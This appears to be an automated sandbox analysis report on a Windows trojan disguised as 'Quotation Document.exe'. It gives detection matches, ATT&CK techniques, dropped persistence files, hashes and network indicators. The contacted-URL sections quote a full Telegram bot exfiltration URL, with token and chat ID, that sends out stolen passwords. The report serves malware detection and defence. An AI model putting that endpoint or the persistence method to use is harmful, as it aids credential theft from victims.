Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	11 Native API	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	212 Process Injection	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	Security Account Manager	124 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	231 Security Software Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	11 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation Document.exe	66%	ReversingLabs	Win32.Trojan.AutoitInject
Quotation Document.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\emboweling\neophobia.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\emboweling\neophobia.exe	66%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679778644&caption=user%20/%20Passwords%20/%20173.254.250.77	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.77	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.microsoft.s	RegSvcs.exe, 00000007.00000002.2906364224.0000000005412000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.telegram.org	RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://api.telegram.org/bot	RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://reallyfreegeoip.org/xml/173.254.250.77l	RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org/q	RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.2903015296.0000000002D58000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679	RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.telegram.org	RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000007.00000002.2903015296.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot-/sendDocument?chat_id=	RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546477
Start date and time:	2024-11-01 00:36:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quotation Document.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 65 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Quotation Document.exe

Simulations

Behavior and APIs

Time	Type	Description
19:38:51	API Interceptor	63x Sleep call for process: RegSvcs.exe modified
23:38:46	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	PZKAQY0bX5.exe	Get hash	malicious	Blank Grabber	Browse
	aLRjksjY78.exe	Get hash	malicious	HackBrowser	Browse
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	200716 SUMI SAUJANA Water Pump 100%.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
193.122.6.168	PROFORMA FATURA pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	clipper.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Slip_SJJ023639#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	z1MRforsteamDRUM-A1_pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	INVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	z17Mz7zumpwTUMRxyS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	INVOICE ATTACHMENT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	MB267382625AE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	z17Mz7zumpwTUMRxyS.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	INVOICE ATTACHMENT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	MB267382625AE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	132.226.8.169
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
api.telegram.org	PZKAQY0bX5.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	aLRjksjY78.exe	Get hash	malicious	HackBrowser	Browse	149.154.167.220
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	200716 SUMI SAUJANA Water Pump 100%.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	200716 SUMI SAUJANA Water Pump 100%.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Eprdtdrqbr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Quotation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	PROFORMA FATURA pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	clipper.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Invoices.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
TELEGRAMRU	oZ7nac01Em.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	PZKAQY0bX5.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	aLRjksjY78.exe	Get hash	malicious	HackBrowser	Browse	149.154.167.220
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	sF9f27gI0U.exe	Get hash	malicious	LummaC	Browse	104.21.33.140
	https://www.phsinc.com/?bwfan-track-action=click&bwfan-track-id=0ecdd1bdf2276cad3fa2d27ffa918e84&bwfan-uid=e2dffed46dd69d19d18bc527d6255bd5&bwfan-link=%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%2E%72%69%67%6F%74%69%6C%65%73%2E%63%6F%6D%2F%6A%50%73%51%57%55%63%42	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	https://hotmail.pizza4you.com.br/	Get hash	malicious	Mamba2FA	Browse	104.17.25.14
	greenthingswithgreatnewsforgetmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	188.114.96.3
	ykDoK8BtxW.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	z17Mz7zumpwTUMRxyS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	INVOICE ATTACHMENT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	MB267382625AE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	200716 SUMI SAUJANA Water Pump 100%.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	greatthingswithmegoods.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	149.154.167.220
	seethebestthingswithgreatthingshrewithme.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	149.154.167.220
	creatednewthingsformee.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	149.154.167.220
	greenthingswithgreatnewsforgetmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	149.154.167.220
	TJXpRilNkh.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	IM3OLcx7li.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	1bE8S5sN9S.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	149.154.167.220
	http://amtso.eicar.org/PotentiallyUnwanted.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Quotation Document.exe
File Type:	data
Category:	dropped
Size (bytes):	209408
Entropy (8bit):	7.822393794674
Encrypted:	false
SSDEEP:	6144:6zugXfOyyYcb9XOQZcgQTJ8q5GHQ4e1v2uucdc:66dTVvY8UGY1vsJ
MD5:	59266D5B1290902EB22072A742F2D655
SHA1:	157B79299413739032693B43F1D0DADD7ACE647C
SHA-256:	A6ADF1311C4C7E25D39DB9E1439E730D0B28ADAF74D2686EBE8600678F7EB511
SHA-512:	AA034B8ABE76B067F11AD285397F22B1BB717FADABE37D451CD0920B3172BD4733394F03655E2D6DA5EDD72FF2EB1ECC18CF6A29F4D15D2468B6860E3C3594FD
Malicious:	false
Reputation:	low
Preview:	...MR9Q1FK86..YB.CDO7FI7.Q9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLC.O7FG(._9.8.j.7..x.$*7oG4&P?0TqR#%VY1o;'l11!./'...jq\-/].HBSfLCDO7FI_]..}@.5.G.1u3.=vlH8vF./2.<`I.;c(.2.5.ItjY3MH.OphQH.>.<~`?1.7.I.8Z9.3.F6EOYBLCDO7FI7MQ9...86EO..LC.N3F=.M.9Q1BK86E.YaMHEF7F.6MQ.P1BK86j.YBLSDO7.H7MQyQ1RK86GOYGLCDO7FI2MQ9Q1BK8.FOYFLC.t5FK7M.9Q!BK(6EOYRLCTO7FI7MA9Q1BK86EOYB.VFOgFI7M1;Q.SJ86EOYBLCDO7FI7MQ9Q1BK86EO..MCXO7FI7MQ9Q1BK86EOYBLCDO7FI7M.4S1.K86EOYBLCDO7.H7.P9Q1BK86EOYBLCDO7FI7MQ9Q1BK.B 7-BLC\.6FI'MQ9.0BK<6EOYBLCDO7FI7Mq9QQl9\W1.YB..DO7.H7M?9Q1.J86EOYBLCDO7FIwMQy.U#?Y6EO.rLCDo5FI!MQ9[3BK86EOYBLCDO7.I7..K"C!K86.^XBL#FO7TH7Mq;Q1BK86EOYBLCD.7F.7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86EOYBLCDO7FI7MQ9Q1BK86E

C:\Users\user\AppData\Local\emboweling\neophobia.exe

Download File

Process:	C:\Users\user\Desktop\Quotation Document.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1175717
Entropy (8bit):	7.298173654239306
Encrypted:	false
SSDEEP:	12288:ALkcoxg7v3qnC11ErwIhh0F4qwUgUny5QLURDWlWWUXVDioc0ELeN3FuYy96QX4w:WfmMv6Ckr7Mny5QLURKgWod7TgIQXae
MD5:	CD3C7F532DCFFD81361915BF691CFBD0
SHA1:	DDAA78FA6DF0B9F19A0B7C9E8F54C4224F6A7A14
SHA-256:	5E3521BEE81BB39DAE47648627EA8810F88DC0A16055EFA1EADD779F804F60F1
SHA-512:	D22B4F09FE235B8CBE6827C7158BECF3573A4E5DA6BB4F22E54055376195BFD812D8642969B9B2F917598B227FACEDD99C82C914E96B3FA5658B77BF83372F25
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@.................................5!........@.......@.....................<...T........6........................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc....6.......8...H..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Download File

Process:	C:\Users\user\AppData\Local\emboweling\neophobia.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	3.412589300103438
Encrypted:	false
